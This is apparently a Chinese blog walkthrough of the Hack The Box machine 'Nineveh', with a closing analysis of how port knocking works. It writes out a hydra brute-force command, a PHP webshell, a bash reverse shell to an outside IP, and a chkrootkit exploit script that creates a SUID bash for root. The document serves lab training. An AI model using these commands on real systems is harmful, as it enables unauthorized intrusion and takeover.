HTB-Nineveh

请添加图片描述

信息收集

在这里插入图片描述
在这里插入图片描述

80端口

在这里插入图片描述
目录扫描
在这里插入图片描述
/info.php目录
在这里插入图片描述

443端口

在这里插入图片描述

目录扫描
在这里插入图片描述
在这里插入图片描述
这完全没头绪,估计是信息收集漏了东西,重新来一遍。

80端口-新

哈,我就知道。
在这里插入图片描述
当我输入admin会发现抱错变成了密码不可用,说明admin用户存在。
在这里插入图片描述
在这里插入图片描述
没有任何提示,尝试一下hydra的暴力破解。

在这里插入图片描述
在这里插入图片描述

443端口-新

多了张图片secure_notes
在这里插入图片描述
对443登录进行hydra暴力破解,hydra -l aster -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -s 443 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:F=Incorrect password." -v -t 64在这里插入图片描述
在这里插入图片描述
这有一篇利用的文章,大致类容就是我们可以通过创建一个php后缀的数据库文件并插入php代码实现php代码执行。在这里插入图片描述根据描述来做一遍,首先创建一个新数据库。
在这里插入图片描述
接着创建一个表,字段选一个。
在这里插入图片描述
然后输入字段名,类型为TEXT,默认值为<?php phpinfo()?>在这里插入图片描述

最后一步,需要我们运行它,但我们怎么运行它。创建完后可以返回查看更多信息。
在这里插入图片描述
比如数据库名,数据库路径,但是目前没有找到地方可以运行。
在这里插入图片描述
对两个端口分别做一次目录扫描看看。结果没有任何帮助,再次回头看80端口的department目录时候发现了引用notes的url路径有些可疑。
在这里插入图片描述
并且图片的路径也是。
在这里插入图片描述
怀疑可能存在LFI,测试输入ninevehNotes1.txt时出现了警告。
在这里插入图片描述
简单测试发现貌似url要包含files/ninevehNotes.txt才能够读取文件。
在这里插入图片描述
不包含就会这样。不会出现警告那些。
在这里插入图片描述
再次测试后更正前面的测试结果,url只需要包含files/ninevehNotes即可。
在这里插入图片描述
配合前面的数据库.php文件成功执行php代码。
在这里插入图片描述
现在有个问题如果我直接弄webshell,会遇到文件名长度限制。
在这里插入图片描述
所以需要优化一下LFI的payload,最终测试发现只用包含/ninevehNotes就可以,/ninevehNotes/../etc/passwd
在这里插入图片描述

立足

使用cmd=id,会发现目标把它当成文件名来处理了。
在这里插入图片描述
可以用/ninevehNotes/../var/tmp/aster.php&cmd=id来避开这个问题(建立webshell的时候用双引号来定义webshell的key,比如<?php system($_REQUEST["cmd"]);?>,单引号会被转义导致webshell不可用)。
在这里插入图片描述
与运算符"&"会被当做浏览器参数所以需要url编码,bash -c "bash -i >%26 /dev/tcp/10.10.14.31/443 0>%261"
在这里插入图片描述

www-data -> amrois

收集半天信息没有任何收获,只有在/var/www/ssl/secure_notes目录下有两个文件。
在这里插入图片描述
还有一个挑战。
在这里插入图片描述
所有线索都指向这张图片,对其使用strings发现了ssh的私钥以及公钥。
在这里插入图片描述

但是无法使用其登录amrois用户。binwalk表示nineveh.png还暗藏玄机。
在这里插入图片描述

加上-e参数分离。
在这里插入图片描述
又有许多东西,好好整理一下。
在这里插入图片描述
secret目录内的两个文件就是前面strings的ssh公钥私钥。
在这里插入图片描述

还有两个文件54和54.zlib暂时没有用处。在目标上查看进程发现了一个knockd。
在这里插入图片描述

knock是一个用来隐藏SSH的程序,客户端向服务端发送暗号对应上后才会从防火墙打开SSH服务器,断开后又会有新的暗号。查看一下knock的配置文件/etc/knockd.conf
在这里插入图片描述
openSSH中的序列就是暗号,也就是序列中的那几个号码,暗号需要按照序列的顺序来核对。那么我们怎么敲门呢?先做个实验,直接nmap对方22端口显示被过滤。
在这里插入图片描述
这时候我们开始敲门对暗号:knock 10.10.10.43 571 290 911

在这里插入图片描述

这时候目标已经对我们敞开了大门(要想关闭的话反过来敲一次即可)在这里插入图片描述

amrois -> root

使用pspy查看时间任务的时候发现很忙的样子。
在这里插入图片描述
这一堆东西的结果似乎都指向了/report目录。
在这里插入图片描述
根据结果知道,可能那一堆东西在检查某些二进制程序是否收到感染、一些可能会有敏感日志的位置是否存在日志等。
在这里插入图片描述
但是这一分钟生成一次,文件大小还是27K,久而久之会很吃空间的,所以猜测可能root或者amrois会有一个时间任务来清理一次。
在这里插入图片描述
在这里插入图片描述
另外在pspy64跑出来的进程中中我还发现了chown amrois:amrois /report/report-23-04-27:06:14.txt
在这里插入图片描述
如果是amrois用户自己的时间任务为啥还要修改用户和用户组,可能是root,也可能是诱饵。里面还有两个经常使用的脚本。

  • /bin/bash /root/vulnScan.sh
  • /bin/sh /usr/bin/chkrootkit

在这里插入图片描述
/usr/bin/chkrootkit是一个检查rootkit的工具。当我使用bash尝试启动它时出现了Permission denied。
在这里插入图片描述
但是我用sh启动尝试启动它出现了/bin/sh: 0: Can’t open /usr/bin/chkrootkit。
在这里插入图片描述
对bash和sh进行检查发现,/bin/sh链接到dash。dash最主要的目的是为了执行脚本,语言语法没有其他shell多,但是它执行脚本快。dash和bash都没有权限执行chkrootkit。
在这里插入图片描述
是的,看起来似乎没有入口,似乎无懈可击。但是对chkrootkit进行exploit搜索会有两个结果。
在这里插入图片描述
条件都满足,唯一不确定的是chkrootkit的版本。
在这里插入图片描述
在tmp创建一个update,内容如下:

#!/bin/bash
cp /bin/bash /tmp/bash
chmod u+s /tmp/bash

在这里插入图片描述
修改update权限为777后耐心等待。
在这里插入图片描述

其他有意思的地方

knock knock - Who’s there?

PS:(本人菜鸟一枚,可能错误地方非常之多,欢迎大家指出)
我很好奇knock是通过发送什么来与目标进行核对,tcp包?还是udp包?或者是其他有意思的玩意?
通过knock在/etc/knockd.conf配置文件中能看到它通过暗号后向防火墙添加规则的命令:start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
向防火墙插入一条规则(-I),允许(-j ACCEPT)成功匹配暗号的IP(-s %IP%)发送tcp的数据包(-p tcp)到本地的22端口(--dport)。由于没有找到knock的源码(可能我忽略了什么),所以用我仅有的能力去逆向并尝试找到knock的关键。

knock向目标敲门的时候会发送hitting,表示正在敲门。
在这里插入图片描述
最先开始创建套接字,地址族为ai_family,套接字类型为SOCK_DGRAM(基于UDP),使用缺省的连接方式连接。
在这里插入图片描述
然后进行判断是否socket成功。
在这里插入图片描述
接着在处理主机名和端口正确的情况下,根据我们选择TCP还是UDP。
在这里插入图片描述
v9会创建我们选择的TCP套接字或UDP套接字。经过对主机、口令验证检查后打印出来。接着就是调用connect函数进行TCP连接。通过socket对目标及端口进行knock。
在这里插入图片描述
发送完后就进行结束处理的环节,然后准备处理下一个暗号。
在这里插入图片描述
所以knock是通过向目标端口发送TCP/UDP包,目标的knock收到并做一些记录表示完成暗号配对。所以我们也可以通过nmap来向目标发送tcp包。在这里插入图片描述
倒着敲门关闭大门后nmap对22端口的tcp包已被过滤。
1
对目标进行TCP发包nmap -Pn -p 571,290,911 10.10.10.43(-Pn 跳过发送ICMP包的过程,也就是默认目标存活),但nmap会帮我们按照端口大小顺序排序后发送TCP SYN包,所以不能用这种办法。

在这里插入图片描述

将重新发包次数设置为0后再次尝试。for port in {571,290,911};do nmap -Pn --max-retries 0 -p $port 10.10.10.43;done

在这里插入图片描述
不知道knock会不会对敲门的时间进行判断,以防万一还是加上--host-timeout参数for port in {571,290,911};do nmap -Pn --max-retries 0 --host-timeout 100 -p $port 10.10.10.43;done

但为什么nmap只用SYN包就能够完成一次TCP握手呢?首先大致看看TCP三次握手:

  1. 客户端第一次发送的SYN包给服务端表示来握手服务端收到
  2. 服务器收到后恢复ACK包给客户端表示可以,客户端收到后设置为单向和服务端连接
  3. 客户端向服务端发送SYN/ACK,服务端收到后设置为单向和客户端连接,此时TCP连接成功。

nmap 默认是SYN扫描,官方文档有写道。
在这里插入图片描述

而逆向所知道socket的类型是SOCK_STREAM ,是需要三次完全握手的,但如果我使用-sT全扫描,似乎knock并不接受三次握手。
在这里插入图片描述
至此,菜鸟的我对其分析结果如下:knock是以TCP SYN来对暗号,如果正确就返回ACK,不需要再次返回一次SYN/ACK,而只需要你问我答两次即可。

socket type

struct addrinfo结构体相关变量及其含义可以看看Stoneshen1211写的文章

enum sock_type {
SOCK_STREAM = 1,
SOCK_DGRAM = 2,
SOCK_RAW = 3, 
SOCK_RDM = 4, 
SOCK_SEQPACKET = 5, 
SOCK_DCCP = 6, 
SOCK_PACKET = 10,
};
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值